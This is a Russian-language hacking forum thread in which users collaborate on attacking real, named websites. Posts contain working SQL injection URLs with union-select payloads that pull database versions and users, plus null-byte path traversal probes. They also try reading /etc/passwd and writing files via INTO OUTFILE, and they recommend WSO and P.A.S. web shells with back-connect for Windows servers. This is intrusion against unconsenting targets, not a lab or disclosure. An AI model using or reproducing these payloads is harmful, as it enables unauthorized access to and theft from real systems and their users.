19.12.2012, 17:35
|
|
Новичок
Регистрация: 26.12.2009
Сообщений: 3
С нами:
8618274
Репутация:
0
|
|
Сообщение от BigBear
Если у Вас используется php >5.3, то там данная дыра уже закрыта
MQ=Off ??
_ttp://mreseo.com/hosting.php?id=../123%00
Так что вернёт ???
На основании чего такие предположения ?
Скорее всего юзер ограничен своей директорией.
Код:
/home/content/28/9889628/html/mreseo/
Код:
?id=../123%00
Failed opening 'pages/../123\0.php'
|
|
|
19.12.2012, 17:50
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Сообщение от qwwertty
Скорее всего юзер ограничен своей директорией.
Код:
/home/content/28/9889628/html/mreseo/
Код:
?id=../123%00
Failed opening 'pages/../123\0.php'
Причем здесь ограничения в директории? Ответ уже был дан: версия php 5.3, ////4096/// не прокатит, как и %00 из-за настрек в php.ini, поэтому расширение .php вы не как не отбросите.
ПРУФ: ?id=../index
|
|
|
|
19.12.2012, 20:41
|
|
Новичок
Регистрация: 26.12.2009
Сообщений: 3
С нами:
8618274
Репутация:
0
|
|
Ещё интересна возможность раскрутки такой скули.
Код:
_ttps://www.trimaxcloud.com/partner.php?id=7'&idsub=39'
Кавычки экранирует, вывода нет.
Всё что есть - раскрытие путей
Код:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in C:\wamp2\www\partner.php on line 10
По тому же дорку:
Код:
_ttp://www.tcilmanagedservices.com/partner.php?id=7'&idsub=39'
P.S. Какой шелл лучше использовать для windows? WSO не поддерживает командную строку в вин, как я вижу. |
|
|
|
20.12.2012, 13:05
|
|
Познающий
Регистрация: 03.12.2012
Сообщений: 46
С нами:
7074326
Репутация:
0
|
|
Вот нашел скрипт, позволяющий, как мне кажется то-ли залить файл на сервер, то-ли запустить скрипт.
Но моих познаний явно не хватает для оценки его возможностей:
Код:
0)
$c = ' $(function() { $("select[name=type]").val ('.$CURUSER['cs_last_type'].') });
';
$c .='
Заголовок:
Тип:
'.$o.'
Отрывок:
';
$title = 'Добавить код';
}
else
{
$text = $_POST['text'];
$title = strip_tags ($_POST['title']);
$type = intval ($_POST['type']);
include ('include/geshi.php');
$language = strtolower ($types[$type]);
$path = 'include/geshi/';
$geshi = new GeSHi($text, $language, $path);
$geshi->enable_line_numbers (GESHI_FANCY_LINE_NUMBERS);
$geshi->set_tab_width (4);
$hltext = $geshi->parse_code();
sql_query ("INSERT INTO `codeshare` SET
`title` = ".sqlesc ($title).",
`user_id` = ".$CURUSER['id'].",
`type` = ".$type.",
`size` = ".mb_strlen ($text)."
");
$id = mysql_insert_id ();
sql_query ("INSERT INTO `codeshare_data` SET
`id` = ".$id.",
`text` = ".sqlesc (htmlspecialchars ($text, ENT_COMPAT, 'UTF-8')).",
`hltext` = ".sqlesc ($hltext)."
");//or die (mysql_error ());
sql_query ('UPDATE `users` SET `cs_last_type` = '.$type.' WHERE `id` = '.$CURUSER['id']);
header ('Location: /codeshare.php?id='.$id);
die ();
}
?>
Если он может выполнять другой код, то мне достаточно провести инъекцию и выполнить ее используя этот скрипт.
Подскажите, как это сделать, или укажите утилиту, которая может проанализировать код на уязвимость
Спасибо |
|
|
|
20.12.2012, 14:05
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от qwwertty
Кавычки экранирует, вывода нет.
Всё что есть - раскрытие путей
Бред пишешь.
_ttps://www.trimaxcloud.com/partner.php?idsub=39&id=7'+and+1=2+union+select+1, @@version,3,4+--+
_ttp://www.tcilmanagedservices.com/partner.php?idsub=39&id=7'+and+1=2+union+select+1, @@version,3,4+--+
Сообщение от None
P.S. Какой шелл лучше использовать для windows? WSO не поддерживает командную строку в вин, как я вижу.
Тем же WSO сделай бэкконект и сиди со своей консольки.
Ещё как альтернативу юзаю P.A.S. шелл.
|
|
|
|
20.12.2012, 17:02
|
|
Познающий
Регистрация: 29.01.2012
Сообщений: 44
С нами:
7519286
Репутация:
3
|
|
Есть SQLi
Код:
http://www.lory-press.ru/showreview.php?id=9999999999999.9+union+select+1,2,3,table_name+from+information_schema.tables+where+table_schema!=0x696e666f726d6174696f6e5f736368656d61--+
В ответ получаю
Сообщение от None
Incorrect database name 'mysql.o'
Не могу вкурить в чем проблема |
|
|
|
20.12.2012, 17:28
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от WendM
Есть SQLi
Код:
http://www.lory-press.ru/showreview.php?id=9999999999999.9+union+select+1,2,3,table_name+from+information_schema.tables+where+table_schema!=0x696e666f726d6174696f6e5f736368656d61--+
В ответ получаю
Не могу вкурить в чем проблема _ttp://www.lory-press.ru/showreview.php?id=1+and+1=2+union+select+1,@@versi on,3,4
_ttp://www.lory-press.ru/showreview.php?id=1+and+1=2+union+select+1,@@versi on,3,4+from+dual+--+
Вердикт неутешителен - фильтруется "точка"
Замены типа %2e и %252e не помогают.
|
|
|
|
20.12.2012, 17:35
|
|
Познающий
Регистрация: 29.01.2012
Сообщений: 44
С нами:
7519286
Репутация:
3
|
|
Сообщение от BigBear
_ttp://www.lory-press.ru/showreview.php?id=1+and+1=2+union+select+1,@@versi on,3,4
_ttp://www.lory-press.ru/showreview.php?id=1+and+1=2+union+select+1,@@versi on,3,4+from+dual+--+
Вердикт неутешителен - фильтруется "точка"
Замены типа %2e и %252e не помогают.
_http://www.lory-press.ru/showreview.php?id=9999999999999.9+order+by+4+--+
А почему тут не фильтруется?
|
|
|
|
20.12.2012, 18:08
|
|
Новичок
Регистрация: 26.12.2009
Сообщений: 3
С нами:
8618274
Репутация:
0
|
|
Сообщение от BigBear
_ttp://www.lory-press.ru/showreview.php?id=1+and+1=2+union+select+1,@@versi on,3,4
_ttp://www.lory-press.ru/showreview.php?id=1+and+1=2+union+select+1,@@versi on,3,4+from+dual+--+
Вердикт неутешителен - фильтруется "точка"
Замены типа %2e и %252e не помогают.
Ты не прав, скорее всего база пуста.
В базе mysql у рута пустой пароль(локалхост), но вторая запись выглядит както странно - ни логина ни пароля, только запись "локалхост"
В теории тут FILE_PRIV=Y но на практике /etc/passwd не читает
Пруф>>>
_tp://www.lory-press.ru/showreview.php?id=9999999999999.9+union+select+1,u ser%28%29,3,4+--+
|
|
|
|
20.12.2012, 18:16
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от qwwertty
Ты не прав, скорее всего база пуста.
В базе mysql у рута пустой пароль(локалхост), но вторая запись выглядит както странно - ни логина ни пароля, только запись "локалхост"
В теории тут FILE_PRIV=Y но на практике /etc/passwd не читает
Проверил ещё раз.
Извиняюсь, был не прав. Фильтруется не точка - фильтруются запросы из information_shema
_ttp://www.lory-press.ru/showreview.php?id=1+and+1=2+union+select+1,@@versi on,3,4+from+lory.books+--+
File_Priv=N
_ttp://www.lory-press.ru/showreview.php?id=1+and+1=2+union+select+1,222,3,4 +from+lory.books+into+outfile+'/tmp/1.txt'+--+
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
